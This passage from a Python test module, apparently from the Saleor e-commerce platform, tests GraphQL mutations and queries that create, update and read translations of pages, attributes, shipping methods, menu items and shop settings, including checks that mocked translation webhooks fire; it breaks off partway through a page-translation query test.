@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_page_create_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    page,
    permission_manage_translations,
    settings,
):
    """Creating a page translation fires the TRANSLATION_CREATED webhook."""
    # given
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    variables = {
        "pageId": graphene.Node.to_global_id("Page", page.id),
        "input": {"title": "Strona PL"},
    }

    # when
    response = staff_api_client.post_graphql(
        PAGE_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    # then
    translated = get_graphql_content(response)["data"]["pageTranslate"]["page"][
        "translation"
    ]
    assert translated["title"] == "Strona PL"
    assert translated["language"]["code"] == "PL"

    translation = page.translations.first()
    mocked_webhook_trigger.assert_called_once_with(
        generate_translation_payload(translation, staff_api_client.user),
        WebhookEventAsyncType.TRANSLATION_CREATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
def test_page_create_translation_for_content(
    staff_api_client, page, permission_manage_translations
):
    """Translating only the content leaves the translated title unset."""
    content = dummy_editorjs("content", True)
    variables = {
        "pageId": graphene.Node.to_global_id("Page", page.id),
        "input": {"content": content},
    }

    response = staff_api_client.post_graphql(
        PAGE_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    translation = get_graphql_content(response)["data"]["pageTranslate"]["page"][
        "translation"
    ]
    assert translation["title"] is None
    assert translation["content"] == content
    assert translation["language"]["code"] == "PL"
def test_page_create_translation_for_content_title_as_null(
    staff_api_client, page, permission_manage_translations
):
    """An explicit ``title: null`` alongside content is accepted."""
    content = dummy_editorjs("content", True)
    variables = {
        "pageId": graphene.Node.to_global_id("Page", page.id),
        "input": {"title": None, "content": content},
    }

    response = staff_api_client.post_graphql(
        PAGE_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    translation = get_graphql_content(response)["data"]["pageTranslate"]["page"][
        "translation"
    ]
    assert translation["title"] is None
    assert translation["content"] == content
    assert translation["language"]["code"] == "PL"
def test_page_create_translation_by_translatable_content_id(
    staff_api_client,
    page,
    permission_manage_translations,
):
    """The mutation also resolves a PageTranslatableContent global ID."""
    node_id = graphene.Node.to_global_id("PageTranslatableContent", page.id)
    variables = {"pageId": node_id, "input": {"title": "Strona PL"}}

    response = staff_api_client.post_graphql(
        PAGE_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    translation = get_graphql_content(response)["data"]["pageTranslate"]["page"][
        "translation"
    ]
    assert translation["title"] == "Strona PL"
    assert translation["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_page_update_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    page,
    permission_manage_translations,
    settings,
):
    """Updating an existing translation fires the TRANSLATION_UPDATED webhook."""
    # given: webhook plugin active and a pre-existing PL translation
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    translation = page.translations.create(language_code="pl", title="Strona")
    variables = {
        "pageId": graphene.Node.to_global_id("Page", page.id),
        "input": {"title": "Strona PL"},
    }

    # when
    response = staff_api_client.post_graphql(
        PAGE_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    # then
    translated = get_graphql_content(response)["data"]["pageTranslate"]["page"][
        "translation"
    ]
    assert translated["title"] == "Strona PL"
    assert translated["language"]["code"] == "PL"

    translation.refresh_from_db()
    mocked_webhook_trigger.assert_called_once_with(
        generate_translation_payload(translation, staff_api_client.user),
        WebhookEventAsyncType.TRANSLATION_UPDATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
ATTRIBUTE_TRANSLATE_MUTATION = """
mutation attributeTranslate($attributeId: ID!) {
attributeTranslate(
id: $attributeId,
languageCode: PL,
input: {name: "Kolor PL"}
) {
attribute {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_attribute_create_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    color_attribute,
    permission_manage_translations,
    settings,
):
    """Creating an attribute translation fires the TRANSLATION_CREATED webhook."""
    # given
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    variables = {
        "attributeId": graphene.Node.to_global_id("Attribute", color_attribute.id)
    }

    # when
    response = staff_api_client.post_graphql(
        ATTRIBUTE_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    # then
    translated = get_graphql_content(response)["data"]["attributeTranslate"][
        "attribute"
    ]["translation"]
    assert translated["name"] == "Kolor PL"
    assert translated["language"]["code"] == "PL"

    translation = color_attribute.translations.first()
    mocked_webhook_trigger.assert_called_once_with(
        generate_translation_payload(translation, staff_api_client.user),
        WebhookEventAsyncType.TRANSLATION_CREATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
def test_attribute_create_translation_by_translatable_content_id(
    staff_api_client,
    color_attribute,
    permission_manage_translations,
):
    """The mutation also resolves an AttributeTranslatableContent global ID.

    Fix: the test previously built a plain ``Attribute`` global ID, which made
    it a duplicate of ``test_attribute_create_translation`` instead of covering
    the translatable-content lookup path its name (and every sibling
    ``..._by_translatable_content_id`` test in this module) promises.
    """
    translatable_content_id = graphene.Node.to_global_id(
        "AttributeTranslatableContent", color_attribute.id
    )
    response = staff_api_client.post_graphql(
        ATTRIBUTE_TRANSLATE_MUTATION,
        {"attributeId": translatable_content_id},
        permissions=[permission_manage_translations],
    )
    data = get_graphql_content(response)["data"]["attributeTranslate"]
    assert data["attribute"]["translation"]["name"] == "Kolor PL"
    assert data["attribute"]["translation"]["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_attribute_update_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    color_attribute,
    permission_manage_translations,
    settings,
):
    """Updating an existing translation fires the TRANSLATION_UPDATED webhook."""
    # given: webhook plugin active and a pre-existing PL translation
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    translation = color_attribute.translations.create(language_code="pl", name="Kolor")
    variables = {
        "attributeId": graphene.Node.to_global_id("Attribute", color_attribute.id)
    }

    # when
    response = staff_api_client.post_graphql(
        ATTRIBUTE_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    # then
    translated = get_graphql_content(response)["data"]["attributeTranslate"][
        "attribute"
    ]["translation"]
    assert translated["name"] == "Kolor PL"
    assert translated["language"]["code"] == "PL"

    translation.refresh_from_db()
    mocked_webhook_trigger.assert_called_once_with(
        generate_translation_payload(translation, staff_api_client.user),
        WebhookEventAsyncType.TRANSLATION_UPDATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
ATTRIBUTE_VALUE_TRANSLATE_MUTATION = """
mutation attributeValueTranslate($attributeValueId: ID!, $name: String) {
attributeValueTranslate(
id: $attributeValueId,
languageCode: PL,
input: { name: $name }
) {
attributeValue {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_attribute_value_create_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    pink_attribute_value,
    permission_manage_translations,
    settings,
):
    """Creating a value translation fires the TRANSLATION_CREATED webhook."""
    # given
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    variables = {
        "attributeValueId": graphene.Node.to_global_id(
            "AttributeValue", pink_attribute_value.id
        ),
        "name": "Róż PL",
    }

    # when
    response = staff_api_client.post_graphql(
        ATTRIBUTE_VALUE_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    # then
    translated = get_graphql_content(response)["data"]["attributeValueTranslate"][
        "attributeValue"
    ]["translation"]
    assert translated["name"] == "Róż PL"
    assert translated["language"]["code"] == "PL"

    translation = pink_attribute_value.translations.first()
    mocked_webhook_trigger.assert_called_once_with(
        generate_translation_payload(translation, staff_api_client.user),
        WebhookEventAsyncType.TRANSLATION_CREATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
def test_attribute_value_create_translation_by_translatable_content_id(
    staff_api_client, pink_attribute_value, permission_manage_translations
):
    """The mutation also resolves an AttributeValueTranslatableContent ID."""
    node_id = graphene.Node.to_global_id(
        "AttributeValueTranslatableContent", pink_attribute_value.id
    )
    variables = {"attributeValueId": node_id, "name": "Róż PL"}

    response = staff_api_client.post_graphql(
        ATTRIBUTE_VALUE_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    translation = get_graphql_content(response)["data"]["attributeValueTranslate"][
        "attributeValue"
    ]["translation"]
    assert translation["name"] == "Róż PL"
    assert translation["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_attribute_value_update_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    pink_attribute_value,
    permission_manage_translations,
    settings,
):
    """Updating an existing translation fires the TRANSLATION_UPDATED webhook."""
    # given: webhook plugin active and a pre-existing PL translation
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    translation = pink_attribute_value.translations.create(
        language_code="pl", name="Różowy"
    )
    variables = {
        "attributeValueId": graphene.Node.to_global_id(
            "AttributeValue", pink_attribute_value.id
        ),
        "name": "Róż PL",
    }

    # when
    response = staff_api_client.post_graphql(
        ATTRIBUTE_VALUE_TRANSLATE_MUTATION,
        variables,
        permissions=[permission_manage_translations],
    )

    # then
    translated = get_graphql_content(response)["data"]["attributeValueTranslate"][
        "attributeValue"
    ]["translation"]
    assert translated["name"] == "Róż PL"
    assert translated["language"]["code"] == "PL"

    translation.refresh_from_db()
    mocked_webhook_trigger.assert_called_once_with(
        generate_translation_payload(translation, staff_api_client.user),
        WebhookEventAsyncType.TRANSLATION_UPDATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
SHIPPING_PRICE_TRANSLATE = """
mutation shippingPriceTranslate(
$shippingMethodId: ID!, $input: ShippingPriceTranslationInput!
) {
shippingPriceTranslate(
id: $shippingMethodId,
languageCode: PL,
input: $input
) {
shippingMethod {
translation(languageCode: PL) {
name
description
language {
code
}
}
}
errors {
message
code
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_shipping_method_create_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    shipping_method,
    permission_manage_translations,
    settings,
):
    """Creating a shipping-method translation fires TRANSLATION_CREATED."""
    # given
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    description = dummy_editorjs("description", True)
    variables = {
        "shippingMethodId": graphene.Node.to_global_id(
            "ShippingMethodType", shipping_method.id
        ),
        "input": {"name": "DHL PL", "description": description},
    }

    # when
    response = staff_api_client.post_graphql(
        SHIPPING_PRICE_TRANSLATE,
        variables,
        permissions=[permission_manage_translations],
    )

    # then
    translated = get_graphql_content(response)["data"]["shippingPriceTranslate"][
        "shippingMethod"
    ]["translation"]
    assert translated["name"] == "DHL PL"
    assert translated["description"] == description
    assert translated["language"]["code"] == "PL"

    translation = shipping_method.translations.first()
    mocked_webhook_trigger.assert_called_once_with(
        generate_translation_payload(translation, staff_api_client.user),
        WebhookEventAsyncType.TRANSLATION_CREATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
def test_shipping_method_create_translation_by_translatable_content_id(
    staff_api_client,
    shipping_method,
    permission_manage_translations,
):
    """The mutation also resolves a ShippingMethodTranslatableContent ID."""
    description = dummy_editorjs("description", True)
    node_id = graphene.Node.to_global_id(
        "ShippingMethodTranslatableContent", shipping_method.id
    )
    variables = {
        "shippingMethodId": node_id,
        "input": {"name": "DHL PL", "description": description},
    }

    response = staff_api_client.post_graphql(
        SHIPPING_PRICE_TRANSLATE,
        variables,
        permissions=[permission_manage_translations],
    )

    translation = get_graphql_content(response)["data"]["shippingPriceTranslate"][
        "shippingMethod"
    ]["translation"]
    assert translation["name"] == "DHL PL"
    assert translation["description"] == description
    assert translation["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_shipping_method_update_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    shipping_method,
    permission_manage_translations,
    settings,
):
    """Updating an existing translation fires the TRANSLATION_UPDATED webhook.

    Consistency fix: reuses the module-level SHIPPING_PRICE_TRANSLATE
    mutation (parameterized by ``input``) instead of a near-duplicate inline
    query string, matching how every other ``*_update_translation`` test in
    this module reuses its entity's shared mutation constant.
    """
    # given: webhook plugin active and a pre-existing PL translation
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    translation = shipping_method.translations.create(language_code="pl", name="DHL")
    shipping_method_id = graphene.Node.to_global_id(
        "ShippingMethodType", shipping_method.id
    )

    # when
    response = staff_api_client.post_graphql(
        SHIPPING_PRICE_TRANSLATE,
        {"shippingMethodId": shipping_method_id, "input": {"name": "DHL PL"}},
        permissions=[permission_manage_translations],
    )

    # then
    data = get_graphql_content(response)["data"]["shippingPriceTranslate"]
    assert data["shippingMethod"]["translation"]["name"] == "DHL PL"
    assert data["shippingMethod"]["translation"]["language"]["code"] == "PL"
    translation.refresh_from_db()
    expected_payload = generate_translation_payload(translation, staff_api_client.user)
    mocked_webhook_trigger.assert_called_once_with(
        expected_payload,
        WebhookEventAsyncType.TRANSLATION_UPDATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
MENU_ITEM_TRANSLATE = """
mutation menuItemTranslate($menuItemId: ID!) {
menuItemTranslate(
id: $menuItemId, languageCode: PL,
input: {name: "Odnośnik PL"}
) {
menuItem {
translation(languageCode: PL) {
name
language {
code
}
}
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_menu_item_update_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    menu_item,
    permission_manage_translations,
    settings,
):
    """Updating an existing translation fires the TRANSLATION_UPDATED webhook.

    Fix: this update test now passes a plain ``MenuItem`` global ID, like
    every other ``*_update_translation`` test in the module. Previously it
    passed a ``MenuItemTranslatableContent`` ID while the
    ``..._by_translatable_content_id`` test below passed a plain ``MenuItem``
    ID — the two IDs were swapped.
    """
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    translation = menu_item.translations.create(language_code="pl", name="Odnośnik")
    menu_item_id = graphene.Node.to_global_id("MenuItem", menu_item.id)
    response = staff_api_client.post_graphql(
        MENU_ITEM_TRANSLATE,
        {"menuItemId": menu_item_id},
        permissions=[permission_manage_translations],
    )
    data = get_graphql_content(response)["data"]["menuItemTranslate"]
    assert data["menuItem"]["translation"]["name"] == "Odnośnik PL"
    assert data["menuItem"]["translation"]["language"]["code"] == "PL"
    translation.refresh_from_db()
    expected_payload = generate_translation_payload(translation, staff_api_client.user)
    mocked_webhook_trigger.assert_called_once_with(
        expected_payload,
        WebhookEventAsyncType.TRANSLATION_UPDATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
def test_menu_item_create_translation_by_translatable_content_id(
    staff_api_client,
    menu_item,
    permission_manage_translations,
):
    """The mutation also resolves a MenuItemTranslatableContent global ID.

    Fix: the test previously built a plain ``MenuItem`` global ID, so it did
    not exercise the translatable-content lookup path its name (and every
    sibling ``..._by_translatable_content_id`` test) promises; that ID had
    been swapped with the one in ``test_menu_item_update_translation`` above.
    """
    translatable_content_id = graphene.Node.to_global_id(
        "MenuItemTranslatableContent", menu_item.id
    )
    response = staff_api_client.post_graphql(
        MENU_ITEM_TRANSLATE,
        {"menuItemId": translatable_content_id},
        permissions=[permission_manage_translations],
    )
    data = get_graphql_content(response)["data"]["menuItemTranslate"]
    assert data["menuItem"]["translation"]["name"] == "Odnośnik PL"
    assert data["menuItem"]["translation"]["language"]["code"] == "PL"
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_shop_create_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    site_settings,
    permission_manage_translations,
    settings,
):
    """Creating a shop-settings translation fires TRANSLATION_CREATED."""
    # given
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    query = """
    mutation shopSettingsTranslate {
        shopSettingsTranslate(
                languageCode: PL, input: {headerText: "Nagłówek PL"}) {
            shop {
                translation(languageCode: PL) {
                    headerText
                    language {
                        code
                    }
                }
            }
        }
    }
    """

    # when
    response = staff_api_client.post_graphql(
        query, permissions=[permission_manage_translations]
    )

    # then
    translated = get_graphql_content(response)["data"]["shopSettingsTranslate"][
        "shop"
    ]["translation"]
    assert translated["headerText"] == "Nagłówek PL"
    assert translated["language"]["code"] == "PL"

    translation = site_settings.translations.first()
    mocked_webhook_trigger.assert_called_once_with(
        generate_translation_payload(translation, staff_api_client.user),
        WebhookEventAsyncType.TRANSLATION_CREATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
SHOP_SETTINGS_TRANSLATE_MUTATION = """
mutation shopSettingsTranslate($input: ShopSettingsTranslationInput!) {
shopSettingsTranslate(
languageCode: PL, input: $input) {
shop {
translation(languageCode: PL) {
headerText
language {
code
}
}
}
errors {
field
code
}
}
}
"""
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.get_webhooks_for_event")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_shop_update_translation(
    mocked_webhook_trigger,
    mocked_get_webhooks_for_event,
    any_webhook,
    staff_api_client,
    site_settings,
    permission_manage_translations,
    settings,
):
    """Updating an existing shop translation emits TRANSLATION_UPDATED."""
    mocked_get_webhooks_for_event.return_value = [any_webhook]
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    # Pre-create the PL translation so the mutation performs an update.
    translation = site_settings.translations.create(
        language_code="pl", header_text="Nagłówek"
    )
    response = staff_api_client.post_graphql(
        SHOP_SETTINGS_TRANSLATE_MUTATION,
        {"input": {"headerText": "Nagłówek PL"}},
        permissions=[permission_manage_translations],
    )
    data = get_graphql_content(response)["data"]["shopSettingsTranslate"]
    assert data["shop"]["translation"]["headerText"] == "Nagłówek PL"
    assert data["shop"]["translation"]["language"]["code"] == "PL"
    translation.refresh_from_db()
    expected_payload = generate_translation_payload(translation, staff_api_client.user)
    mocked_webhook_trigger.assert_called_once_with(
        expected_payload,
        WebhookEventAsyncType.TRANSLATION_UPDATED,
        [any_webhook],
        translation,
        SimpleLazyObject(lambda: staff_api_client.user),
    )
@freeze_time("1914-06-28 10:50")
@patch("saleor.plugins.webhook.plugin.trigger_webhooks_async")
def test_shop_translation_validates_values_lengths(
    mocked_webhook_trigger,
    staff_api_client,
    site_settings,
    permission_manage_translations,
    settings,
):
    """An over-long headerText is rejected with an INVALID field error."""
    # NOTE(review): mocked_webhook_trigger is patched but never asserted on;
    # presumably it only prevents real webhook delivery — confirm.
    settings.PLUGINS = ["saleor.plugins.webhook.plugin.WebhookPlugin"]
    response = staff_api_client.post_graphql(
        SHOP_SETTINGS_TRANSLATE_MUTATION,
        {"input": {"headerText": "Nagłówek PL" * 100}},
        permissions=[permission_manage_translations],
    )
    data = get_graphql_content(response)["data"]["shopSettingsTranslate"]
    assert data["shop"] is None
    assert data["errors"] == [{"field": "headerText", "code": "INVALID"}]
@pytest.mark.parametrize(
    "kind, expected_typename",
    [
        (TranslatableKinds.PRODUCT, "ProductTranslatableContent"),
        (TranslatableKinds.COLLECTION, "CollectionTranslatableContent"),
        (TranslatableKinds.CATEGORY, "CategoryTranslatableContent"),
        (TranslatableKinds.PAGE, "PageTranslatableContent"),
        (TranslatableKinds.SHIPPING_METHOD, "ShippingMethodTranslatableContent"),
        (TranslatableKinds.VOUCHER, "VoucherTranslatableContent"),
        (TranslatableKinds.SALE, "SaleTranslatableContent"),
        (TranslatableKinds.ATTRIBUTE, "AttributeTranslatableContent"),
        (TranslatableKinds.ATTRIBUTE_VALUE, "AttributeValueTranslatableContent"),
        (TranslatableKinds.VARIANT, "ProductVariantTranslatableContent"),
        (TranslatableKinds.MENU_ITEM, "MenuItemTranslatableContent"),
    ],
)
def test_translations_query(
    staff_api_client,
    permission_manage_translations,
    product,
    published_collection,
    voucher,
    sale,
    shipping_method,
    page,
    menu_item,
    kind,
    expected_typename,
):
    """Each TranslatableKinds value resolves to its translatable content type."""
    query = """
        query TranslationsQuery($kind: TranslatableKinds!) {
            translations(kind: $kind, first: 1) {
                edges {
                    node {
                        __typename
                    }
                }
                totalCount
            }
        }
    """
    response = staff_api_client.post_graphql(
        query, {"kind": kind.name}, permissions=[permission_manage_translations]
    )
    data = get_graphql_content(response)["data"]["translations"]
    assert data["edges"][0]["node"]["__typename"] == expected_typename
    assert data["totalCount"] > 0
def test_translations_query_inline_fragment(
    staff_api_client, permission_manage_translations, product
):
    """Inline fragments expose both base and translated product fields."""
    product.translations.create(language_code="pl", name="Produkt testowy")
    query = """
    {
        translations(kind: PRODUCT, first: 1) {
            edges {
                node {
                    ... on ProductTranslatableContent {
                        name
                        translation(languageCode: PL) {
                            name
                        }
                    }
                }
            }
        }
    }
    """
    response = staff_api_client.post_graphql(
        query, permissions=[permission_manage_translations]
    )
    data = get_graphql_content(response)["data"]["translations"]["edges"][0]
    assert data["node"]["name"] == "Test product"
    assert data["node"]["translation"]["name"] == "Produkt testowy"
QUERY_TRANSLATION_PRODUCT = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on ProductTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
def test_translation_query_product(
    staff_api_client,
    permission_manage_translations,
    product,
    product_translation_fr,
):
    """The translation root query resolves a ProductTranslatableContent node."""
    payload = {
        "id": graphene.Node.to_global_id("Product", product.id),
        "kind": TranslatableKinds.PRODUCT.name,
        "languageCode": LanguageCodeEnum.FR.name,
    }
    response = staff_api_client.post_graphql(
        QUERY_TRANSLATION_PRODUCT,
        payload,
        permissions=[permission_manage_translations],
    )
    translatable = get_graphql_content(response)["data"]["translation"]
    assert translatable["name"] == product.name
    assert translatable["translation"]["name"] == product_translation_fr.name
QUERY_TRANSLATION_COLLECTION = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on CollectionTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
def test_translation_query_collection(
    staff_api_client,
    published_collection,
    collection_translation_fr,
    permission_manage_translations,
    channel_USD,
):
    """The translation root query resolves a CollectionTranslatableContent node."""
    channel_listing = published_collection.channel_listings.get()
    # NOTE(review): this get()+save() pair makes no visible modification;
    # confirm whether it is still needed.
    channel_listing.save()
    collection_id = graphene.Node.to_global_id("Collection", published_collection.id)
    variables = {
        "id": collection_id,
        "kind": TranslatableKinds.COLLECTION.name,
        "languageCode": LanguageCodeEnum.FR.name,
    }
    response = staff_api_client.post_graphql(
        QUERY_TRANSLATION_COLLECTION,
        variables,
        permissions=[permission_manage_translations],
    )
    content = get_graphql_content(response)
    data = content["data"]["translation"]
    assert data["name"] == published_collection.name
    assert data["translation"]["name"] == collection_translation_fr.name
QUERY_TRANSLATION_CATEGORY = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on CategoryTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
def test_translation_query_category(
    staff_api_client, category, category_translation_fr, permission_manage_translations
):
    """The translation root query resolves a CategoryTranslatableContent node."""
    variables = {
        "id": graphene.Node.to_global_id("Category", category.id),
        "kind": TranslatableKinds.CATEGORY.name,
        "languageCode": LanguageCodeEnum.FR.name,
    }
    content = get_graphql_content(
        staff_api_client.post_graphql(
            QUERY_TRANSLATION_CATEGORY,
            variables,
            permissions=[permission_manage_translations],
        )
    )
    translatable = content["data"]["translation"]
    assert translatable["name"] == category.name
    assert translatable["translation"]["name"] == category_translation_fr.name
QUERY_TRANSLATION_ATTRIBUTE = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on AttributeTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
def test_translation_query_attribute(
    staff_api_client, translated_attribute, permission_manage_translations
):
    """The translation root query resolves an AttributeTranslatableContent node."""
    attribute = translated_attribute.attribute
    attribute_id = graphene.Node.to_global_id("Attribute", attribute.id)
    variables = {
        "id": attribute_id,
        "kind": TranslatableKinds.ATTRIBUTE.name,
        "languageCode": LanguageCodeEnum.FR.name,
    }
    response = staff_api_client.post_graphql(
        QUERY_TRANSLATION_ATTRIBUTE,
        variables,
        permissions=[permission_manage_translations],
    )
    content = get_graphql_content(response)
    data = content["data"]["translation"]
    assert data["name"] == attribute.name
    assert data["translation"]["name"] == translated_attribute.name
QUERY_TRANSLATION_ATTRIBUTE_VALUE = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on AttributeValueTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
def test_translation_query_attribute_value(
    staff_api_client,
    pink_attribute_value,
    translated_attribute_value,
    permission_manage_translations,
):
    """The translation root query resolves an AttributeValueTranslatableContent node."""
    attribute_value_id = graphene.Node.to_global_id(
        "AttributeValue", pink_attribute_value.id
    )
    variables = {
        "id": attribute_value_id,
        "kind": TranslatableKinds.ATTRIBUTE_VALUE.name,
        "languageCode": LanguageCodeEnum.FR.name,
    }
    response = staff_api_client.post_graphql(
        QUERY_TRANSLATION_ATTRIBUTE_VALUE,
        variables,
        permissions=[permission_manage_translations],
    )
    content = get_graphql_content(response)
    data = content["data"]["translation"]
    assert data["name"] == pink_attribute_value.name
    assert data["translation"]["name"] == translated_attribute_value.name
QUERY_TRANSLATION_VARIANT = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on ProductVariantTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
def test_translation_query_variant(
    staff_api_client,
    permission_manage_translations,
    product,
    variant,
    variant_translation_fr,
):
    """The translation root query resolves a ProductVariantTranslatableContent node."""
    variant_id = graphene.Node.to_global_id("ProductVariant", variant.id)
    variables = {
        "id": variant_id,
        "kind": TranslatableKinds.VARIANT.name,
        "languageCode": LanguageCodeEnum.FR.name,
    }
    response = staff_api_client.post_graphql(
        QUERY_TRANSLATION_VARIANT,
        variables,
        permissions=[permission_manage_translations],
    )
    content = get_graphql_content(response)
    data = content["data"]["translation"]
    assert data["name"] == variant.name
    assert data["translation"]["name"] == variant_translation_fr.name
QUERY_TRANSLATION_PAGE = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on PageTranslatableContent{
id
title
translation(languageCode: $languageCode){
title
}
}
}
}
"""
@pytest.mark.parametrize(
    "is_published, perm_codenames",
    [
        (True, ["manage_translations"]),
        (False, ["manage_translations"]),
        (False, ["manage_translations", "manage_pages"]),
    ],
)
def test_translation_query_page(
    staff_api_client,
    page,
    page_translation_fr,
    is_published,
    perm_codenames,
):
    """Page translations resolve across publication states and permission sets."""
    page.is_published = is_published
    page.save()
    page_id = graphene.Node.to_global_id("Page", page.id)
    perms = list(Permission.objects.filter(codename__in=perm_codenames))
    variables = {
        "id": page_id,
        "kind": TranslatableKinds.PAGE.name,
        "languageCode": LanguageCodeEnum.FR.name,
    }
